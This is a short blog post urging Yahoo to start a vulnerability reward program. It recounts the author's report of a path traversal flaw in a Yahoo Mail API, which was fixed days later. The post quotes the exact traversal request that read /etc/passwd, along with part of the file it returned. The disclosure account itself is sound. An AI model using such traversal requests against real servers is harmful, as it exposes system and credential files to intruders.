Yahoo, please start with a Vulnerability Reward Program

Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking — Reuters Tech (@ReutersTech) May 17, 2013


This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, Paypal, Etsy, etc (list of reward programs @bugcrowd).

Last year I discovered a LFI/Path Traversal vulnerability in a REST-API used by Yahoo Mail and I got a automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.

GET /v2/xframe/../../../../../../../etc/passwd?bc  

HTTP/1.1 200 OK  
Connection: close  
Expires: Thu, 15 Apr 2020 20:00:00 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 29676

root:*:0:0:Charlie &:/root:/usr/local/bin/bash  
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh  
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin  
operator:*:2:5:System &:/:/sbin/nologin  

Some minutes later I got a automated reply from Yahoo Security Contact (security at


Thank you for contacting Yahoo!. These issues have been passed along to the correct teams to investigate. Should a fix be required, we will again contact you and ask that you see the issues as resolved.

Thanks again, Yahoo! Security Contact

Days later the issue was fixed. But no more replies from them!

Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.


comments powered by Disqus